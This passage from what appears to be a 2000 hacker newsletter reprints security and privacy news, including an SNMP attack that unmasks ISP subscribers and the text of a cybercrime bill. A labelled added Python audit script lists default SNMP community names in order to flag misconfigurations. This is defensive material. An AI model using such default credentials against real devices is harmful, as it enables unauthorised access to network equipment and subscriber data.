to partners without telling their own customers. Many sites also change
their practices at will and without warning.
Because privacy breaches are so corrosive to consumer trust, some Web
execs actually welcome broad national standards. IBM (IBM) and Walt Disney
Co. (DIS) have decided not to advertise on Web sites that don't have
privacy policies. Privacy codes must be clearer, says Chris Larsen, CEO
and founder of E-Loan Inc. (EELN), an online loan service that has its
privacy policies audited. ''I think the industry has squandered the
opportunity to take care of this on its own.'' IBM Chairman Louis Gerstner
doesn't go that far. But he has warned Net executives that they must get
serious. ''I am troubled, very troubled, by leaders who have failed to
recognize our responsibility in the transformation of the new economy,''
he says.
We hope other Web execs are listening closely. The policies we propose are
in the best interests of Web businesses. If more consumers can be assured
that their personal information is safe, more of them will flock to the
Net--and click, not exit. There are other explicit benefits for the
industry. Privacy standards create a level playing field, so companies
don't fall into an arms war, each trying to collect the most data--at any
cost. ''Business will benefit from the right level of government
involvement,'' says Nick Grouf, founder of PeoplePC, which offers cheap
PCs and Net connections. ''Standards are good, but they need some teeth,
and this is where government becomes a good partner.''
FEDERAL STANDARD. In the long term, the privacy protection that Business
Week espouses will make life simpler for businesses on the Net. More than
20 states already are moving to enact some kind of guarantees. A minimum
federal standard of online privacy would decrease the cost and complexity
for companies. It also would increase trust. If businesses really want to
be close to their customers, trust is paramount. This approach also will
shrink the gap that has arisen between the U.S. and Europe, where privacy
already is recognized as a right. The Europeans have stood firm, putting
American companies in the peculiar position of extending greater privacy
protection in Germany or France than at home.
It's time to iron out the inconsistencies. Here are our prescriptions for
protecting personal privacy without jeopardizing the promise of
e-commerce...
@HWA
85.0 [HNN] MafiaBoy Released on Bail
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 21st
contributed by Macki
MafiaBoy, a fifteen year old teenager from Montreal, has been released
on bail after appearing Monday in Youth Court for having been accused
of launching a DDoS attack on CNN. He was released under bail
conditions that included a ban on connecting to the Internet or going
to libraries, universities, stores and other places with public access
to computers or computer equipment. An RCMP investigator said the boy
was tracked through traces he left of his computer activity. (The
interesting part is that he has only been charged with the CNN attack
which means he either covered his tracks rather well on the others or
there are more perpetrators yet to be found.)
Nando Times
MafiaBoy IRC Logs
2600 Magazine has posted what they say are IRC logs of someone posing
as Mafiaboy to investigators. Hopefully the FBI is not using these
same fake logs as evidence.
2600.com
http://www.nandotimes.com/technology/story/body/0,1634,500194839-500265475-501381121-0,00.html
http://www.2600.com/news/2000/0420.html
@HWA
86.0 [HNN] Mitnick Banned from Speaking
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 21st
contributed by William Knowles
A Federal Judge has ruled that Kevin Mitnick can not speak at the Utah
Information Technologies Association conference in Salt Lake City. The
Judge felt that the conference was "consulting or advising" which is
prohibited by his probation agreement. Organizers are hoping to fill
the slot with an industry executive.
Deseret News
http://deseretnews.com/dn/view/0,1249,160008642,00.html?
Federal judge bans convicted hacker from taking part in tech conference
A federal judge Monday banned convicted computer hacker Kevin Mitnick from
taking part in a technology conference in Salt Lake City Wednesday.
Mitnick, who gained notoriety for his hacking exploits and spent several
years in a federal prison in Lompoc, Calif., won't be sitting on a computer
security panel discussion at the Utah Information Technologies Association
conference at the Salt Palace Convention Center. The judge kiboshed the
appearance because Mitnick's prison release agreement prohibits him from
"consulting or advising" on the topic of computer-related activity. Monday,
Mitnick did an extended interview promoting the panel discussion on KSL's
Doug Wright Show, where he answered callers' questions about computer
security and told the story of his hacking exploits. He hacked for fun, he
said, and never made any money from it. Richard Nelson, president of UITA,
said Mitnick's public relations representative had indicated that Mitnick
had permission to appear from the U.S. probation office in California. A
few days ago, the organization learned he might not be able to leave
California. Conference organizers are in the process of arranging a
replacement for Mitnick on the cyber-security panel. They are planning on
bringing in a senior staffer from a large company that deals with cyber
security. Nelson said he's sorry Mitnick can't participate. "He's eager to
talk and disappointed he can't come. If you listened (to him on the radio
show), he recognizes he made serious mistakes and he wanted to go forward.
"We're not trying to promote his career, but if he can help information
technology companies in Utah and decision makers dealing with security
issues determine what level of risk they want to take, that's good. There
will always be risk, but you can reduce it by taking security measures."
The UITA conference, "Net Trends 2000: The Digital Revolution" takes
place Wednesday and Thursday.
@HWA
87.0 [HNN] Top Politicos Meet to Discuss Infrastructure Security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 21st
contributed by Weld Pond
We have seen numerous press reports regarding a recent meeting at the
Old Executive office building in support of the Critical Information
Assurance Office. Several top level officials attended the meeting.
Probably the best description of the event we have found was posted by
Russ Cooper to NTBugTraq.
NT BugTraq
http://www.NTBUGTRAQ.COM/default.asp?pid
Not found. Tried searching archives but didn't spend too much time. - Ed
@HWA
88.0 [HNN] NSF To Issue Grants for Security Schooling
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 21st
contributed by mortel
Applications for grants for the Federal Cyber Services program should
be released by the National Science Foundation next month. The grants
will be used by Colleges and Universities to award scholarships to
students studying information security.
Federal Computer Week
http://www.fcw.com/fcw/articles/2000/0417/web-cyber-04-19-00.asp
NSF launching grants for cybercorps
BY Colleen O'Hara
04/19/2000
The National Science Foundation is expected to release applications next
month for grants that would fund the Federal Cyber Services program
designed to train the next generation of digital defenders.
The NSF grants would be available to colleges and universities, which
would use the money to award scholarships to students to study information
assurance. These students would receive the scholarships in exchange for
full-time employment with a federal agency upon graduation. The students
would help protect the government's systems from cyberattack.
NSF hopes to announce by September or October which schools will receive
the grants and hopes to award the actual student scholarships by January
2001, said Shirley Malia, program manager for education and training with
the government's Critical Infrastructure Assurance Office, speaking at the
FOSE conference.
Malia said plans also are under way to establish a virtual nationwide
network of training centers that offer information assurance courses. The
courses would match a set of competencies for information assurance
professionals that the Office of Personnel Management is developing. The
hope is that agencies would use these centers to keep their cybersecurity
workers trained. "If we don't keep the skills of information assurance
[workers] up-to-date, we are extremely vulnerable," Malia said.
The Cyber Services and virtual training network projects are dependent on
fiscal 2001 funding to proceed, Malia said.
@HWA
89.0 [HNN] CalPoly Charges Student with Port Scanning
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 21st
contributed by Zorro
The California Polytechnic State University has charged computer
engineering sophomore Paul Reed with a violation of Title V of the
California Code of Regulations. Mr. Reed was attempting to find a
machine within a DHCP range that was located at a company he worked
for off campus but he conducted his scan from his dorm room using the
CalPoly computer network.
Free Paul
http://freepaul.org/
@HWA
90.0 [HNN] Encrypted Sheet Music Available on Net Soon
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 21st
contributed by root66
Net4music, which has been given access to one million of EMI's songs,
will start to post the sheet music to the Net by the end of April.
Net4music will sell sheet music at $3.95 per download but will use
a software lock to only allow five printouts of the music. (Five? All
people need is one copy, and access to a photocopier.)
Wired
http://www.wired.com/news/culture/0,1284,35735,00.html
EMI Plays Along with Downloads
by Brad King
3:00 a.m. Apr. 19, 2000 PDT
Musicians who want to play along with Aerosmith, Lenny Kravitz, or The
Counting Crows will soon have access to EMI Music Publishing's sheet
music library online.
The subsidiary of the EMI music label on Tuesday said it will give
digital rights management company Net4Music access to one million of
the label's songs in exchange for a minority equity stake.
Net4Music will post 1,000 titles on its site by the end of April, and then
will add 10,000 songs each month until 100,000 songs are posted.
This is the first time a major label has taken steps to have its entire
catalog encoded and sold in digital format.
"This is a niche market for musicians and people who are looking for sheet
music to play," said Martin Bandier, CEO of EMI Publishing. "It's tough to
find a music store that sells sheet music. Now all you have to do is have
a computer terminal."
Net4Music will offer single songs for $3.95 per copy, but the downloads
will feature encryption that limits the number of printouts that can be
made.
Similar types of digital encryption that limit the reuse of content after
purchase, such as SDMI, InterTrust, and Sony's memory stick, have been
failures with consumers. Meanwhile, other attempts at securing content,
like Windows Media Audio, Liquid Audio, and e-books, have proven too easy
to circumvent.
Francois DuLiege, CEO of Net4Music, said his encryption system will not
discourage consumers.
"You will pay less for five copies of digital sheet music than you would
for one copy of sheet music if you went to a retail store," he said. "Most
songs in retail stores don't sell single sets of music, so you have to
purchase the whole package. This, I believe, is much easier for
consumers."
The major music labels have been slow to make recorded music and
compositions available in digital form, but rights management company
Sunhawk set a precedent by signing a deal in 1998 to digitize content from
Warner Music's music catalog.
Sunhawk has been digitizing Warner's Christian music for two years, but
has only digitized about 10,000 songs thus far, having branched out to
encode and digitize other media beyond music.
EMI's Bandier believes the Net4Music deal will expand demand for EMI
content.
"The Christian music business is a small homespun business that is
dependent upon the congregation and others knowing all the lyrics to the
music, so getting that content out there as quickly as possible was
important," Bandier said. "But that only makes up about 5 percent of our
business."
Sunhawk CEO Marlin Eller said the deal will only help move the music
industry to embrace digital e-commerce.
"This validates exactly what we are trying to do digitally," Eller said.
"Industry executives should learn to get off their butts and license their
content. We haven't been seeing theft with this content so far. But (the
reluctant labels) are allowing piracy to take place by not putting up a
legitimate source of content."
@HWA
91.0 [HNN] ISPs Still Vulnerable to SNMP Holes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by Javaman
While holes in SNMP are nothing new, it is surprising just how
vulnerable some ISPs still are to the problem. Philtered.net says that
now a malicious person could extract an ISP user's login name and phone
number directly from the terminal server thereby equating an IP
address with a real person.
Internet News
Philtered.net
http://www.internetnews.com/isp-news/article/0,2171,8_344971,00.html
http://www.philtered.net/
ISPs Battle Privacy Loophole
By Brian McWilliams
Internet service providers Thursday are being warned to batten down their
network access servers against a familiar type of privacy attack that's
making a comeback.
According to a bug-tracking group, so-called greyhat hackers say they have
developed a Perl script that can quietly extract subscribers' phone
numbers and log-in names directly off an ISP's terminal servers using the
Simple Network Management Protocol (SNMP).
Philadelphia-based Philtered.Net is an online community that pursues their
own venue of security-related technical projects. One of the group's
hackers, who uses the handle "Lumpy," said an unauthorized person, armed
with the script and an Internet user's IP address, can easily query a
database on the ISP's access server.
According to Lumpy, it's easy to call the management information base of
an ISP's access server and use standard SNMP commands to transform an
anonymous IP address into the real-world coordinates of a live person.
"People usually think that their IP address is as far as a hacker could go
to find out who they are," Lumpy said. "But a hacker has the ability to
find out who they are through a server directory to discover a person's
home phone numbers and full address."
Lumpy also works as a security consultant and authored the script for
probing SNMP information. He recently posted the information and the
script on the Bugtraq mailing list.
Lumpy said three major ISPs were vulnerable to the attack, but after being
notified the firms took action and properly locked down their servers to
prevent SNMP access. Lumpy also claims that some ISPs have their servers
configured to allow write access permissions to their MIBs and that he's
been able to force dial-up users offline.
Jeff Case, president of SNMP.com, a Tennessee-based network
management-consulting firm, said the unsecured nature of older versions of
SNMP is common knowledge.
"The first version of SNMP is not secure and is subject to these sorts of
attacks," Case said. "We've known about that since 1988 and a new version
of SNMP was made available in 1998. It's been deployed to plug-up the
security holes."
But Lumpy of Philtered.net said that most ISPs could prevent unauthorized
access to their MIBs by properly configuring the hardware when technicians
initially set up a network.
"The reason these holes exist is because people have not bothered to read
the manual where it says in big letters 'change your community names and
block off access to SNMP,' but some ISPs aren't wasting time reading
manuals so this is what happens."
ISPs that want to determine if a SNMP privacy hole exists on their
networks can check out the BugTraq advisory at SecurityFocus.com in order
to tighten-up access to their networks.
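Added example (not part of the original article or the Bugtraq advisory): a small Python audit for the three misconfigurations the article names: default community names, write access to the MIB, and SNMP left open to any source address. It assumes Cisco IOS-style "snmp-server community" lines, since the article names no vendor; the sample config and the weak-name list are constructed.

```python
import re

# Constructed list of default / commonly guessed community names (assumption).
WEAK_COMMUNITIES = {"public", "private", "community", "snmp", "admin", "cisco"}

# Assumed IOS-style syntax: snmp-server community <name> [view <v>] [ro|rw] [<acl>]
COMMUNITY_RE = re.compile(
    r"^\s*snmp-server\s+community\s+(?P<name>\S+)"
    r"(?:\s+view\s+\S+)?"
    r"(?:\s+(?P<mode>ro|rw))?"
    r"(?:\s+(?P<acl>\S+))?\s*$",
    re.IGNORECASE,
)
ACL_RE = re.compile(r"^\s*access-list\s+(?P<acl>\S+)\s+(?:permit|deny)\b",
                    re.IGNORECASE)

# Constructed sample: two default communities plus site-specific ones.
SAMPLE_CONFIG = """\
hostname nas-example
snmp-server community public RO
snmp-server community private RW
snmp-server community Xq7-mgmt-r RO 10
snmp-server community Xq7-mgmt-w RW 10
snmp-server community Kp2-noc-r RO 20
access-list 10 permit 192.0.2.10
"""


def audit_snmp_config(text):
    """Return (line_number, community, issue) tuples in config order."""
    lines = text.splitlines()
    # ACLs that are actually defined somewhere in this config.
    defined_acls = {m.group("acl") for m in map(ACL_RE.match, lines) if m}
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = COMMUNITY_RE.match(line)
        if not m:
            continue  # unrelated line, or a "no snmp-server ..." removal
        name = m.group("name")
        mode = (m.group("mode") or "ro").lower()  # read-only when omitted
        acl = m.group("acl")
        if name.lower() in WEAK_COMMUNITIES:
            findings.append((lineno, name, "default-community"))
        if mode == "rw":
            findings.append((lineno, name, "write-access"))
        if acl is None:
            findings.append((lineno, name, "no-source-acl"))
        elif acl not in defined_acls:
            findings.append((lineno, name, "acl-not-defined"))
    return findings


if __name__ == "__main__":
    for lineno, name, issue in audit_snmp_config(SAMPLE_CONFIG):
        print(f"line {lineno}: community {name!r}: {issue}")
```
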
@HWA
92.0 [HNN] Internet Security Act of 2000
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by Weld Pond
Senator Patrick Leahy has introduced into the Senate the Internet
Security Act of 2000. The bill will give more leeway to law
enforcement to use pen registers and trap and trace devices, remove
the 'loophole' that prevents officers from monitoring an
innocent-host computer without a wiretap order and contains provisions
for equipment forfeiture. (This may be a little overreaction, seems
like a lot of power granted law enforcement.)
S 2430 - via Cryptome
http://cryptome.org/s2430is.txt
[Congressional Record: April 13, 2000 (Senate)]
[Page S2729-S2771]
From the Congressional Record Online via GPO Access [wais.access.gpo.gov]
[DOCID:cr13ap00pt2-155]
STATEMENTS ON INTRODUCED BILLS AND JOINT RESOLUTIONS
[Excerpt]
By Mr. LEAHY:
S. 2430. A bill to combat computer hacking through enhanced law
enforcement and to protect the privacy and constitutional rights of
Americans, and for other purposes; to the Committee on the Judiciary.
Internet Security Act of 2000
Mr. LEAHY. Mr. President, as we head into the twenty-first century,
computer-related crime is one of the greatest challenges facing law
enforcement. Many of our critical infrastructures and our government
depend upon the reliability and security of complex computer systems.
We need to make sure that these essential systems are protected from
all forms of attack. The legislation I am introducing today will help
law enforcement investigate and prosecute those who jeopardize the
integrity of our computer systems and the Internet.
Whether we work in the private sector or in government, we negotiate
daily through a variety of security checkpoints designed to protect
ourselves from being victimized by crime or targeted by terrorists. For
instance, congressional buildings like this one use cement pillars
placed at entrances, photo identification cards, metal detectors, x-ray
scanners, and security guards to protect the physical space. These
security steps and others have become ubiquitous in the private sector
as well.
Yet all these physical barriers can be circumvented using the wires
that run into every building to support the computers and computer
networks that are the mainstay of how we communicate and do business.
This plain fact was amply demonstrated by the recent hacker attacks on
E-Trade, ZDNet, Datek, Yahoo, eBay, Amazon.com and other Internet
sites. These attacks raise serious questions about Internet security--
questions that we need to answer to ensure the long-term stability of
electronic commerce. More importantly, a well-focused and more malign
cyber-attack on computer networks that support telecommunications,
transportation, water supply, banking, electrical power and other
critical infrastructure systems could wreak havoc on our national
economy or even jeopardize our national defense. We have learned that
even law enforcement is not immune. Just recently we learned of a
denial of service attack successfully perpetrated against a FBI web
site, shutting down that site for several hours.
The cybercrime problem is growing. The reports of the CERT
Coordination Center (formerly called the ``Computer Emergency Response
Team''), which was established in 1988 to help the Internet community
detect and resolve computer security incidents, provide chilling
statistics on the vulnerabilities of the Internet and the scope of the
problem. Over the last decade, the number of reported computer security
incidents grew from 6 in 1988 to more than 8,000 in 1999. But that
alone does not reveal the scope of the problem. According to CERT's
most recent annual report, more than four million computer hosts were
affected by the computer security incidents in 1999 alone by damaging
computer viruses, with names like ``Melissa,'' ``Chernobyl,''
``ExploreZip,'' and by the other ways that remote intruders have found
to exploit system vulnerabilities. Even before the recent headline-
grabbing ``denial-of-service'' attacks, CERT documented that such
incidents ``grew at rate around 50% per year'' which was ``greater than
the rate of growth of Internet hosts.''
CERT has tracked recent trends in severe hacking incidents on the
Internet and made the following observations. First, hacking techniques
are getting more sophisticated. That means law enforcement is going to
have to get smarter too, and we need to give them the resources to do
this. Second, hackers have ``become increasingly difficult to locate
and identify.'' These criminals are operating in many different
locations and are using techniques that allow them to operate in
``nearly total obscurity.''
We have been aware of the vulnerabilities to terrorist attacks of our
computer networks for more than a decade. It became clear to me, when I
chaired a series of hearings in 1988 and 1989 by the Subcommittee on
Technology and the Law in the Senate Judiciary Committee on the subject
of high-tech terrorism and the threat of computer viruses, that merely
``hardening'' our physical space from potential attack would only
prompt committed criminals and terrorists to switch tactics and use new
technologies to reach vulnerable softer targets, such as our computer
systems and other critical infrastructures. The government has a
responsibility to work with those in the private sector to assess those
vulnerabilities and defend them. That means making sure our law
enforcement agencies have the tools they need, but also that the
government does not stand in the way of smart technical solutions to
defend our computer systems.
Targeting cybercrime with up-to-date criminal laws and tougher law
enforcement is only part of the solution. While criminal penalties may
deter some computer criminals, these laws usually come into play too
late, after the crime has been committed and the injury inflicted. We
should keep in mind the adage that the best defense is a good offense.
Americans and American firms must be encouraged to take preventive
measures to protect their computer information and systems. Just
recently, internet providers and companies such as Yahoo! and
Amazon.com Inc., and computer hardware companies such as Cisco Systems
Inc., proved successful at stemming attacks within hours thereby
limiting losses.
That is why, for years, I have advocated and sponsored legislation to
encourage the widespread use of strong encryption. Encryption is an
important tool in our arsenal to protect the security of our computer
information and networks. The Administration made enormous progress
earlier this year when it issued new regulations relaxing export
controls on strong encryption. Of course, encryption technology cannot
be the sole source of protection for our critical computer networks and
computer-based infrastructure, but we need to make sure the government
is encouraging--and not restraining--the use of strong encryption and
other technical solutions to protecting our computer systems.
Congress has responded again and again to help our law enforcement
agencies keep up with the challenges of new crimes being executed over
computer networks. In 1984, we passed the Computer Fraud and Abuse Act,
and its amendments, to criminalize conduct when carried out by means
of unauthorized access to a computer. In 1986, we passed the Electronic
Communications Privacy Act (ECPA), which I was proud to sponsor, to
criminalize tampering with electronic mail systems and remote data
processing systems and to protect the privacy of computer users. In the
104th Congress, Senators Kyl, Grassley, and I worked together to enact
the National Information Infrastructure Protection Act to increase
protection under federal criminal law for both government and private
computers, and to address an emerging problem of computer-age blackmail
in which a criminal threatens to harm or shut down a computer system
unless their extortion demands are met.
In this Congress, I have introduced a bill with Senator DeWine, the
Computer Crime Enforcement Act, S. 1314, to set up a $25 million grant
program within the U.S. Department of Justice for states to tap for
improved education, training, enforcement and prosecution of computer
crimes. All 50 states have now enacted tough computer crime control
laws. These state laws establish a firm groundwork for electronic
commerce and Internet security. Unfortunately, too many state and local
law enforcement agencies are struggling to afford the high cost of
training and equipment necessary for effective enforcement of their
state computer crime statutes. Our legislation, the Computer Crime
Enforcement Act, would help state and local law enforcement join the
fight to combat the worsening threats we face from computer crime.
Computer crime is a problem nationwide and in Vermont. I recently
released a survey on computer crime in Vermont. My office surveyed 54
law enforcement agencies in Vermont--43 police departments and 11
State's attorney offices--on their experience investigating and
prosecuting computer crimes. The survey found that more than half of
these Vermont law enforcement agencies encounter computer crime, with
many police departments and state's attorney offices handling 2 to 5
computer crimes per month.
Despite this documented need, far too many law enforcement agencies
in Vermont cannot afford the cost of policing against computer crimes.
Indeed, my survey found that 98% of the responding Vermont law
enforcement agencies do not have funds dedicated for use in computer
crime enforcement.
My survey also found that few law enforcement officers in Vermont are
properly trained in investigating computer crimes and analyzing cyber-
evidence. According to my survey, 83% of responding law enforcement
agencies in Vermont do not employ officers properly trained in computer
crime investigative techniques. Moreover, my survey found that 52% of
the law enforcement agencies that handle one or more computer crimes
per month cited their lack of training as a problem encountered during
investigations. Proper training is critical to ensuring success in the
fight against computer crime.
This bill will help keep our computer crime laws up to date as an
important backstop and deterrent. I believe that our current computer
crime laws can be enhanced and that the time to act is now. We should
pass legislation designed to improve our law enforcement efforts while
at the same time protecting the privacy rights of American citizens.
The bill I offer today will make it more efficient for law
enforcement to use tools that are already available--such as pen
registers and trap and trace devices--to track down computer criminals
expeditiously. It will ensure that law enforcement can investigate and
prosecute hacker attacks even when perpetrators use foreign-based
computers to facilitate their crimes. It will implement criminal
forfeiture provisions to ensure that cybercriminals are forced to
relinquish the tools of their trade upon conviction. It will also close
a current loophole in our wiretap laws that prevents a law enforcement
officer from monitoring an innocent-host computer with the consent of
the computer's owner and without a wiretap order to track down the
source of denial-of-service attacks. Finally, this legislation will
assist state and local police departments in their parallel efforts to
combat cybercrime, in recognition of the fact that this fight is not
just at the federal level.
The key provisions of the bill are:
Jurisdictional and Definitional Changes to the Computer Fraud and
Abuse Act: The Computer Fraud and Abuse Act, 18 U.S.C. Sec. 1030, is
the primary federal criminal statute prohibiting computer frauds and
hacking. This bill would amend the statute to clarify the appropriate
scope of federal jurisdiction. First, the bill adds a broad definition
of ``loss'' to the definitional section. Calculation of loss is
important both in determining whether the $5,000 jurisdictional hurdle
in the statute is met, and, at sentencing, in calculating the
appropriate guideline range and restitution amount.
Second, the bill amends the definition of ``protected computer,'' to
expressly include qualified computers even when they are physically
located outside of the United States. This clarification will preserve
the ability of the United States to assist in international hacking
cases. A ``Sense of Congress'' provision specifies that federal
jurisdiction is justified by the ``interconnected and interdependent
nature of computers used in interstate or foreign commerce.''
Finally, the bill expands the jurisdiction of the United States
Secret Service to encompass investigations of all violations of 18
U.S.C. Sec. 1030. Prior to the 1996 amendments to the Computer Fraud
and Abuse Act, the Secret Service was authorized to investigate any and
all violations of section 1030, pursuant to an agreement between the
Secretary of Treasury and the Attorney General. The 1996 amendments,
however, concentrated Secret Service jurisdiction on certain specified
subsections of section 1030. The current amendment would return full
jurisdiction to the Secret Service and would allow the Justice and
Treasury Departments to decide on the appropriate work-sharing balance
between the two.
Elimination of Mandatory Minimum Sentence for Certain Violations of
Computer Fraud and Abuse Act: Currently, a directive to the Sentencing
Commission requires that all violations, including misdemeanor
violations, of certain provisions of the Computer Fraud and Abuse Act
be punished with a term of imprisonment of at least six months. The
bill would change this directive to the Sentencing Commission so that
no such mandatory minimum would be required.
Additional Criminal Forfeiture Provisions: The bill adds a criminal
forfeiture provision to the Computer Fraud and Abuse Act, requiring
forfeiture of physical property used in or to facilitate the offense as
well as property derived from proceeds of the offense. It also
supplements the current forfeiture provision in 18 U.S.C. 2318, which
prohibits trafficking in, among other things, counterfeit computer
program documentation and packaging, to require the forfeiture of
replicators and other devices used in the production of such
counterfeit items.
Pen Registers and Trap and Trace Devices: The bill makes it easier
for law enforcement to use these investigative techniques in the area
of cybercrime, and institutes corresponding privacy protections. On the
law enforcement side, the bill gives nationwide effect to pen register
and trap and trace orders obtained by Government attorneys, thus
obviating the need to obtain identical orders in multiple federal
jurisdictions. It also clarifies that such devices can be used on all
electronic communication lines, not just telephone lines. On the
privacy side, the bill provides for greater judicial review of
applications for pen registers and trap and trace devices and
institutes a minimization requirement for the use of such devices. The
bill also amends the reporting requirements for applications for such
devices by specifying the information to be reported.
Denial of Service Investigations: Currently, a person whose computer
is accessed by a hacker as a means for the hacker to reach a third
computer cannot simply consent to law enforcement monitoring of his
computer. Instead, because this person is not technically a party to
the communication, law enforcement needs wiretap authorization under
Title III to conduct such monitoring. The bill will close this loophole
by explicitly permitting such monitoring without a wiretap if prior
consent is obtained from the person whose computer is being hacked
through and used to send ``harmful interference to a lawfully operating
computer system.''
Encryption Reporting: The bill directs the Attorney General to report
the number of wiretap orders in which encryption was encountered and
whether such encryption precluded law enforcement from obtaining the
plaintext of intercepted communications.
State and Local Computer Crime Enforcement: The bill directs the
Office of Federal Programs to make grants to assist State and local law
enforcement in the investigation and prosecution of computer crime.
Legislation must be balanced to protect our privacy and other
constitutional rights. I am a strong proponent
of the Internet and a defender of our constitutional rights to speak
freely and to keep private our confidential affairs from either private
sector snoops or unreasonable government searches. These principles can
be respected at the same time we hold accountable those malicious
mischief makers and digital graffiti sprayers, who use computers to
damage or destroy the property of others. I have seen Congress react
reflexively in the past to address concerns over anti-social behavior
on the Internet with legislative proposals that would do more harm than
good. A good example of this is the Communications Decency Act, which
the Supreme Court declared unconstitutional. We must make sure that our
legislative efforts are precisely targeted on stopping destructive acts
and that we avoid scattershot proposals that would threaten, rather
than foster, electronic commerce and sacrifice, rather than promote,
our constitutional rights.
Technology has ushered in a new age filled with unlimited potential
for commerce and communications. But the Internet age has also ushered
in new challenges for federal, state and local law enforcement
officials. Congress and the Administration need to work together to
meet these new challenges while preserving the benefits of our new era.
The legislation I offer today is a step in that direction.
Mr. President, I ask unanimous consent that the text of the bill be
printed in the Record.
There being no objection, the bill was ordered to be printed in the
Record, as follows:
S. 2430
Be it enacted by the Senate and House of Representatives of
the United States of America in Congress assembled,
SECTION 1. SHORT TITLE.
This Act may be cited as the ``Internet Security Act of
2000''.
SEC. 2. AMENDMENTS TO THE COMPUTER FRAUD AND ABUSE ACT.
Section 1030 of title 18, United States Code, is amended--
(1) in subsection (a)--
(A) in paragraph (5)--
(i) by inserting ``(i)'' after ``(A)'' and redesignating
subparagraphs (B) and (C) as clauses (ii) and (iii),
respectively;
(ii) in subparagraph (A)(iii), as redesignated, by adding
``and'' at the end; and
(iii) by adding at the end the following:
``(B) the conduct described in clause (i), (ii), or (iii)
of subparagraph (A)--
``(i) caused loss aggregating at least $5,000 in value
during a 1-year period to 1 or more individuals;
``(ii) modified or impaired, or potentially modified or
impaired, the medical examination, diagnosis, treatment, or
care of 1 or more individuals;
``(iii) caused physical injury to any person; or
``(iv) threatened public health or safety;''; and
(B) in paragraph (6), by adding ``or'' at the end;
(2) in subsection (c)--
(A) in paragraph (2)--
(i) in subparagraph (A), by striking ``and'' at the end;
and
(ii) in subparagraph (B), by inserting ``or an attempted
offense'' after ``in the case of an offense''; and
(B) by adding at the end the following:
``(4) forfeiture to the United States in accordance with
subsection (i) of the interest of the offender in--
``(A) any personal property used or intended to be used to
commit or to facilitate the commission of the offense; and
``(B) any property, real or personal, that constitutes or
that is derived from proceeds traceable to any violation of
this section.'';
(3) in subsection (d)--
(A) by striking ``subsections (a)(2)(A), (a)(2)(B), (a)(3),
(a)(4), (a)(5), and (a)(6) of''; and
(B) by striking ``which shall be entered into by'' and
inserting ``between'';
(4) in subsection (e)--
(A) in paragraph (2)(B), by inserting ``, including
computers located outside the United States'' before the
semicolon;
(B) in paragraph (4), by striking the period at the end and
inserting a semicolon;
(C) in paragraph (7), by striking ``and'' at the end;
(D) in paragraph (8), by striking ``, that'' and all that
follows through ``; and'' and inserting a semicolon;
(E) in paragraph (9), by striking the period at the end and
inserting ``; and''; and
(F) by adding at the end the following:
``(10) the term `loss' includes--
``(A) the reasonable costs to any victim of--
``(i) responding to the offense;
``(ii) conducting a damage assessment; and
``(iii) restoring the system and data to their condition
prior to the offense; and
``(B) any lost revenue or costs incurred by the victim as a
result of interruption of service.'';
(5) in subsection (g), by striking ``Damages for violations
involving damage as defined in subsection (c)(8)(A)'' and
inserting ``losses specified in subsection (a)(5)(B)(i)'';
and
(6) by adding at the end the following:
``(i) Provisions Governing Forfeiture.--Property subject to
forfeiture under this section, any seizure and disposition
thereof, and any administrative or judicial proceeding in
relation thereto, shall be governed by subsection (c) and
subsections (e) through (p) of section 413 of the
Comprehensive Drug Abuse Prevention and Control Act of 1970
(21 U.S.C. 853).''.
SEC. 3. SENSE OF CONGRESS.
It is the sense of Congress that--
(1) acts that damage or attempt to damage computers used in
the delivery of critical infrastructure services such as
telecommunications, energy, transportation, banking and
financial services, and emergency and government services
pose a serious threat to public health and safety and cause
or have the potential to cause losses to victims that include
costs of responding to offenses, conducting damage
assessments, and restoring systems and data to their
condition prior to the offense, as well as lost revenue and
costs incurred as a result of interruptions of service; and
(2) the Federal Government should have jurisdiction to
investigate acts affecting protected computers, as defined in
section 1030(e)(2)(B) of title 18, United States Code, as
amended by this Act, even if the effects of such acts occur
wholly outside the United States, as in such instances a
sufficient Federal nexus is conferred through the
interconnected and interdependent nature of computers used in
interstate or foreign commerce or communication.
SEC. 4. MODIFICATION OF SENTENCING COMMISSION DIRECTIVE.
Pursuant to its authority under section 994(p) of title 28,
United States Code, the United States Sentencing Commission
shall amend the Federal sentencing guidelines to ensure that
any individual convicted of a violation of paragraph (4) or
(5) of section 1030(a) of title 18, United States Code, can
be subjected to appropriate penalties, without regard to any
mandatory minimum term of imprisonment.
SEC. 5. FORFEITURE OF DEVICES USED IN COMPUTER SOFTWARE
COUNTERFEITING.
Section 2318(d) of title 18, United States Code, is amended
by--
(1) inserting ``(1)'' before ``When'';
(2) inserting ``, and any replicator or other device or
thing used to copy or produce the computer program or other
item to which the counterfeit label was affixed, or was
intended to be affixed'' before the period; and
(3) by adding at the end the following:
``(2) The forfeiture of property under this section,
including any seizure and disposition of the property, and
any related judicial or administrative proceeding, shall be
governed by the provisions of section 413 (other than
subsection (d) of that section) of the Comprehensive Drug
Abuse Prevention and Control Act of 1970 (21 U.S.C. 853).''.
SEC. 6. CONFORMING AMENDMENT.
Section 492 of title 18, United States Code, is amended by
striking ``or 1720,'' and inserting ``, 1720, or 2318''.
SEC. 7. PEN REGISTERS AND TRAP AND TRACE DEVICES.
Section 3123 of title 18, United States Code is amended--
(1) by striking subsection (a) and inserting the following:
``(a) Issuance of Order.--
``(1) Requests from attorneys for the government.--Upon an
application made under section 3122(a)(1), the court may
enter an ex parte order authorizing the installation and use
of a pen register or a trap and trace device if the court
finds, based on the certification by the attorney for the
Government, that the information likely to be obtained by
such installation and use is relevant to an ongoing criminal
investigation. Such order shall apply to any entity providing
wire or electronic communication service in the United States
whose assistance is necessary to effectuate the order.
``(2) Requests from state investigative or law enforcement
officers.--Upon an application made under section 3122(a)(2),
the court may enter an ex parte order authorizing the
installation and use of a pen register or a trap and trace
